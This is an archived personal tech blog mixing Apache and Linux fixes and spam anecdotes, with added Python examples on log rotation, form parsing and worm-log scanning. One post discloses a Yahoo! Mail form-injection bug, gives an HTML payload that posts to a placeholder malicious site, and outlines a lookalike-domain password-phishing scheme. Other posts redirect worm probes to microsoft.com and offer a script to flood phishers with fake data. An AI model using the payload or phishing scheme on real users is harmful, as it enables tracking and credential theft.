Google Reader
Tue, 28 Mar 2006 21:09:00 -0600
Google Reader, for syndicated site feeds. In Beta. Good, needs a lot of work and a blogroll export feature.
Context: You’ve recently switched to apache2 with separate vhost configurations in sites-enabled and you are trying to get CGI scripts to execute in a directory called something other than “cgi-bin”. You’ve turned on the ExecCGI option for the directory.
Symptom: You are getting “Access Forbidden” errors, and your server’s error log shows “Options FollowSymLinks or SymLinksIfOwnerMatch is off which implies that RewriteRule directive is forbidden”
Further context: You’re not running any RewriteRules.
Solution: Uncomment the line AddHandler cgi-script .cgi in your main apache2.conf file.
Reason this is the error you get: Hell if I know.
In closely related news, ScotchFinder is back.
If Blogger stopped publishing to your server four months ago, change (or ask your sysadmin to change) “PasswordAuthentication” to “yes” in your sshd config file (check /etc/ssh/sshd_config).
In related news, mcgees.org is back.
Last weekend’s upgrade, as it was intended, was unsuccessful. After setting all my installation options, RedHat told me it didn’t support my hardware. At least it had the grace to inform me before it reformatted my hard drive. So I took the burst of energy, the Mountain Dew, and the gummi worms, and applied them to getting the things that were bothering me fixed in my Debian installation. I succeeded in getting X running, a bit of a chore under Debian, switched out mouses, and upgraded all my packages. I wanted Firefox, so I used Konqueror to get the installer from the website. Konqueror wasn’t that bad, though, so I was on my way to Blogger to report that fact when Konqueror crashed. So go ahead and ignore that recommendation.
I couldn’t get the Firefox installer to run, so I looked around, and found the proper way was to set apt-get’s distribution to unstable so Firefox would show up in the list of packages and use dselect to install it.
This server runs Apache 2.0 under Linux. I tried to archive an access log using mv mcgees_access_log mcgees_access_log.2, then I executed touch mcgees_access_log, assuming that Apache would continue writing to mcgees_access_log. It didn’t. My second guess would have been that it would start appending to mcgees_access_log.2. It didn’t do that either. Instead it stopped writing log files and I lost three weeks’ worth. Restarting Apache fixes the problem.
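As an added illustration (not part of the original post), the following Python simulation reproduces the mv-then-touch rotation on a POSIX filesystem: the server's open descriptor follows the renamed inode, so the new file stays empty until the server closes and reopens its log, which is the step a restart (or `apachectl graceful`) performs. The file names and line counts are constructed.

```python
import os
import tempfile


def _count_lines(path: str) -> int:
    with open(path) as f:
        return sum(1 for _ in f)


def simulate_rotation(reopen: bool, before: int = 3, after: int = 2):
    """Write `before` lines, rotate with mv + touch, then write `after` more.

    reopen=False is the sequence from the post: the server keeps the descriptor
    it opened at startup. reopen=True adds the step a restart performs: the
    server closes and reopens the log path after the rename.
    Returns (lines in access_log, lines in access_log.2). Assumes POSIX rename
    semantics (renaming an open file is allowed and keeps the inode).
    """
    with tempfile.TemporaryDirectory() as tmp:
        log = os.path.join(tmp, "access_log")
        rotated = log + ".2"
        server = open(log, "a")          # httpd opens the log once at startup
        try:
            for i in range(before):
                server.write(f"request {i}\n")
            server.flush()
            os.rename(log, rotated)      # mv access_log access_log.2
            open(log, "a").close()       # touch access_log (new, empty inode)
            if reopen:
                server.close()
                server = open(log, "a")  # descriptor now points at the new file
            for i in range(after):
                server.write(f"request {before + i}\n")
            server.flush()
        finally:
            server.close()
        return _count_lines(log), _count_lines(rotated)


if __name__ == "__main__":
    print("mv + touch only:", simulate_rotation(reopen=False))
    print("mv + touch + reopen:", simulate_rotation(reopen=True))
```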
Wow, I just received a 4-1-9 letter en français. New export markets for Nigeria?
Ten years ago, Ron Avitzur was sneaking into the offices of his former employer, Apple, to continue development on a project that had been officially discontinued:
Q: Do you work here?
A: No.
Q: You mean you’re a contractor?
A: Actually, no.
Q: But then who’s paying you?
A: No one.
Q: How do you live?
A: I live simply.
Q: (Incredulously) What are you doing here?!
(via Richard Eriksson)
Google begins to digitize paper books. Amazing potential.
If you install the Audible DownloadManager for iPod & iTunes, don’t spend a long time debugging why it doesn’t seem to do anything. Simply download a program from Audible, and it will automatically be added to your iTunes library. No documentation I’ve been able to find, but there you go.
I received a junk fax today advertising an undervalued stock. The disclaimer at the bottom of the fax informed me that the company sending out the faxes had received $219,965 to produce and distribute the “newsletter”. Good grief. If it’s not making the spammers rich, it’s making the telcos and the USPS some nice money.
It seems every year someone makes a statement about people not possibly needing the full extent of new computing resources, but it always seems that needs grow to fill the void. So anybody want to play a game? Name an amount of storage that you think you will never need. I calculated it out, and NTSC-quality video of the entirety of your life would comfortably fit in a petabyte — that’s an application I could think of evolving, but it’s still not that resource-dependent, relatively speaking (modern hard disks, for instance, have a million times as much space as a floppy disk from 20 years ago. All we need is another factor of 10,000 or so.)
The total amount of information in the world was calculated some years ago to be 10,000 LOC, or 1 exabyte, or 1000 petabytes. So I cannot imagine needing more than 10 exa. What would I possibly do with all that storage? I don’t need full-motion video of the lives of everyone in the world. I don’t think, anyway. And aren’t network speeds supposed to reach the point where local storage becomes useless any day now? (Prediction: it’s not going to happen. Ever.) So, 10 exa, that’s my number.
Processor speed, however, I cannot even imagine a number I couldn’t use. There are always mathematical applications that could grow to fill the need. That Sandia system can do 1.8 teraflops. That’s not nearly enough. I can see games eventually needing petaflop capabilities for rendering and physics models (I might actually turn into a video game player at that point.) But an exaflop: now really, what the heck would we use that for in our daily lives?
Checking [whether] standard error [closed in a Perl script], though, is a bit more problematic. After all, if STDERR fails to close, what are you planning to do about it? — The Perl Cookbook, 2nd Edition
They go on to suggest a couple of things, but it’s still a funny comment. By way of analogy, compare it to submitting a customer service request to a company saying that the customer service request system is not delivering any customer service requests.
On the very next page, it says “As of Perl v5.8 there is a way to mix [buffered and unbuffered I/O functions]: I/O layers. You can’t turn on buffering for the unbuffered functions, but you can turn off buffering for the unbuffered ones.” Great, really useful! I can turn off buffering on an unbuffered function and end up with: an unbuffered function! The presence of typos like this is really obnoxious, because when I find a confusing passage I have to wonder whether they are making a mistake or I’m just not understanding.
This ViewSonic sucks. I’m buying a new monitor. A flat panel. Today. Or Friday.
If you’re setting up sendmail, this page should help.
My XP box is unstable. My Linux box is slow. That gives me the choice of fast, unreliable browsing or slow, predictable browsing. I’m downloading Opera to see if that speeds things up a bit on the Linux box.
ASCII Art Stereograms. For real. The fact that this is possible makes my brain hurt.
Holy cow! Did I actually get this to work? Wow.
If you see this message, you are on the brand new mcgees.org server, running Debian 3.0r2. If you can see this, I’m very pleased with myself. If you can’t see this question, please let me know by email.
If you want some fun and have Perl installed, download my Perl script fuck_with_the_scammers.pl and run it. Some “phishers” sent me a fake PayPal message soliciting my email, PayPal password, credit card number, expiration date, CCV, and (get this) PIN number. Hard to believe anyone would be stupid enough to fall for it. Anyway, run this on your system and you’ll give them 1000 randomly-generated entries to sort through. It would be really useful if we could distribute this across multiple IPs. You’ll need my bigwordlist.txt as well, but that’s fun to have anyway.
A few unconnected notes:
As a first-order approximation, all 41kB emails are viruses.
I know it’s one o’clock in the morning, but I want to do my bills right now and both my banking site and my loan site are down for maintenance. This doesn’t happen with paper, does it?
If you were wondering, it’s a pain in the neck to edit half-gigabyte bitmaps in Photoshop. Every operation takes ten minutes.
Used to spam messages claiming “A special offer just for you,” I was vaguely amused by the subject of a message trapped by my filter, namely “We are sending this hot recommendation to millions”. At last they had the decency to come right out and admit it.
It’s bad enough that I have to be spammed constantly with offers of pharmaceuticals. The least they could do would be to figure how to spell “prescription”.
Another cool link discovered through Random TinyURL: Rhetorical Systems’ TTS demo. Really, try it. [wav]
I just found an exploit for Yahoo! Mail. First, a little background:
If you receive an email with an HTML attachment, Yahoo! will give you the option to download it, but it will also render it inline, showing you the web page encoded in the attachment. Yahoo! performs a couple of processing steps on the email to try to secure it: first, the text target="_blank" onsubmit="return ShowFormWarning()" is added to the <form> tag. The target specification means that the requested page will show up in its own window and not take over your Yahoo! Mail session. The onsubmit specification causes a pop-up dialog to appear, informing the user that he or she is about to send information to someone other than Yahoo!. Yahoo! will also close the <form> tag if — and this is critical — it doesn’t think it has already been closed. It apparently checks if the form is closed by searching for the text </form> after each instance of <form …>.
So here is the exploit: send an HTML attachment with </form> enclosed in a comment. Consider the following as an example:
<form action="http://www.malicious-site.com/track-email.cgi" method="post">
<input type="hidden" value="Message_ID_123456_was_read_by_Joshua_McGee">
<!-- </form> -->
Here’s how it works: the Yahoo! Mail parser will check the message, find </form>, and assume everything is fine. But now the form is not closed, so all further inputs that might be encountered are treated as belonging to malicious-site.com’s form. This would not be a problem if Yahoo! coded their pages a little better, but two things make it a problem as it currently stands. First, the mail page is bracketed by one big <form> tag to control the “Delete” and “Reply” (etc.) features. Second, the “Delete” button is actually a “Submit” button for this form!
So let’s walk through an example. I send you the malicious code above as an HTML attachment. On the page that displays the email, Yahoo! opens one big <form> to control “Delete” and “Reply” functionality. It renders the malicious code inline, so my code starts an (invisible!) form and inserts an (invisible!) tracking code. I “end” my <form> tag with a </form> tag embedded in a comment. Yahoo! checks to see if I have closed my nested <form>, wrongly determines that I have, and doesn’t add a </form> tag for me. The next <input> encountered is the “Delete” button, which is really a “Submit” button. But since the malicious <form> was never closed, it is a “Submit” button for the malicious <form>. So when the user clicks the “Delete” button, expecting to have the message deleted, it instead sends the tracking ID to the malicious site.
“Now wait,” you’re thinking, if you are not totally lost already. “This will trigger the ShowFormWarning() function.” True. But what’s the naïve user to think? They are clicking a Yahoo! button, so how could it not be safe? My guess is many users would just ignore the message.
I’m sure you could do more clever things: it might be possible to use JavaScript to populate the invisible form with system data, for instance. Or maybe the target URL is a clone of the “Your session has expired, login again” screen. You could even set the form action URL to something like http://login.yahoo10.com/config/mail?.intl=us&.lg=us, assuming you owned yahoo10.com (it’s available.) When the form data is submitted, then, a Yahoo!-looking window would pop up with a Yahoo!-looking URL asking for the user’s password. Don’t you figure most people would enter it? The malicious site now has your email address and password. Then all the site would have to do, so as not to arouse suspicion, is bring up a Yahoo!-looking page that says “Invalid password”, but on this one have the form correctly set to send the data to Yahoo!. Voila.
I’ve reported this bug to Yahoo!.
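The root cause described above is a substring check standing in for an HTML parser. As an added example (not Yahoo!'s code or the post's), the Python below runs the naive search the post describes against a constructed copy of the attachment, then the same input through the standard library's tokenizer, which delivers comment text to a separate callback and so sees the form as still open; the last function appends the closing tags a real parser says are missing. The host name is a placeholder.

```python
from html.parser import HTMLParser

# Constructed attachment modelled on the one in the post; .invalid is a
# reserved placeholder TLD, not a real site.
ATTACHMENT = """<form action="http://malicious-site.invalid/track-email.cgi" method="post">
<input type="hidden" value="Message_ID_123456_was_read">
<!-- </form> -->
"""


def naive_form_closed(html: str) -> bool:
    """The check the post describes: after each <form, look for the text
    </form>. A </form> inside a comment satisfies it, so the form stays open."""
    h, pos = html.lower(), 0
    while True:
        start = h.find("<form", pos)
        if start == -1:
            return True
        end = h.find("</form>", start)
        if end == -1:
            return False
        pos = end + len("</form>")


class FormBalance(HTMLParser):
    """Track <form> nesting with a real tokenizer; comment contents go to
    handle_comment and never reach handle_endtag."""

    def __init__(self) -> None:
        super().__init__()
        self.depth = 0             # forms opened by the attachment, still open
        self.stray_close = False   # a </form> that would close the host page's form

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.depth += 1

    def handle_endtag(self, tag):
        if tag == "form":
            if self.depth == 0:
                self.stray_close = True
            else:
                self.depth -= 1


def _balance(html: str) -> FormBalance:
    p = FormBalance()
    p.feed(html)
    p.close()
    return p


def parser_form_closed(html: str) -> bool:
    p = _balance(html)
    return p.depth == 0 and not p.stray_close


def close_unclosed_forms(html: str) -> str:
    """Append the </form> tags the parser says are missing before inlining."""
    return html + "</form>" * _balance(html).depth
```

Closing the form is the narrow fix; the nested-form problem disappears entirely if the attachment is not rendered inside the host page's own form.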
When the Code Red worm attacks, it tries to access the file default.ida to propagate itself across Microsoft IIS servers. The Nimda worm does the same thing, except it tries to access root.exe and/or cmd.exe. My server, running Apache, is immune to these exploits, but my site returns a 404 page in response and consumes my bandwidth in the process. I could create an empty file and redirect all results to this file, but I get a deeper, more smug satisfaction by sending these requests on to Microsoft. Let the worm eat up their bandwidth; it’s their sloppy programming that caused the problem in the first place.
To do the same thing yourself, add the following RewriteRules to your httpd.conf file (mod_rewrite must be loaded, and the rewrite engine switched on, for them to take effect):
RewriteEngine On
RewriteRule ^(.*default\.ida.*)$ http://www.microsoft.com$1 [R]
RewriteRule ^(.*root\.exe.*)$ http://www.microsoft.com$1 [R]
RewriteRule ^(.*cmd\.exe.*)$ http://www.microsoft.com$1 [R]
For more information on using RewriteRules, consult the Apache documentation.
(I have no idea if the worms actually go to the redirected URLs. Anyone know?)
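Before or instead of redirecting, it is worth measuring how much of the log is worm noise. This added example (not the post's code) parses constructed common-log-format lines, classifies requests by the same file names the RewriteRules key on, and totals the bytes served in response; hosts and timestamps are invented documentation values.

```python
import re
from collections import Counter

# Constructed access-log lines (common log format); hosts are documentation
# addresses and the requests mirror the file names named in the post.
SAMPLE_LOG = """\
203.0.113.7 - - [18/Sep/2001:10:01:02 -0500] "GET /default.ida?XXXXXXXXXXXX HTTP/1.0" 404 276
198.51.100.9 - - [18/Sep/2001:10:01:05 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
198.51.100.9 - - [18/Sep/2001:10:01:06 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 276
192.0.2.44 - - [18/Sep/2001:10:02:11 -0500] "GET /index.html HTTP/1.1" 200 5120
"""

LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) (?P<bytes>\S+)$'
)

# The same file names the RewriteRules key on.
WORM_SIGNATURES = {
    "code-red": re.compile(r"default\.ida", re.I),
    "nimda": re.compile(r"(?:root|cmd)\.exe", re.I),
}


def classify_request(path: str):
    """Return the worm family a request path matches, or None."""
    for name, pattern in WORM_SIGNATURES.items():
        if pattern.search(path):
            return name
    return None


def scan_log(text: str):
    """Tally worm probes: (hits per family, bytes served to them, probing hosts)."""
    hits, wasted, hosts = Counter(), 0, set()
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                      # not common log format; skip
        family = classify_request(m["path"])
        if family is None:
            continue
        hits[family] += 1
        hosts.add(m["host"])
        if m["bytes"] != "-":
            wasted += int(m["bytes"])     # the 404 page the post wants to stop serving
    return hits, wasted, hosts
```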
Read about RealDriver’s amazing full-sized cab simulator of a GP-38 for use with Microsoft’s Train Simulator. They also offer a smaller train controller for use with this software and (soon) your model train set.
From I, Cringely: The Pulpit:
Finally, I am sorry to report this week the death of George Morrow, one of the early pioneers of personal computing. Morrow started two computer companies of his own — Morrow’s Microstuff and Thinkertoys (later called Morrow Designs after the lawyers for TinkerToys objected) — and his computer designs were also built by Osborne Computing and Zenith Data Systems. George was audited by the IRS, and the agent used a Z-171 computer that George designed. The computer failed halfway through the audit, so George fixed it.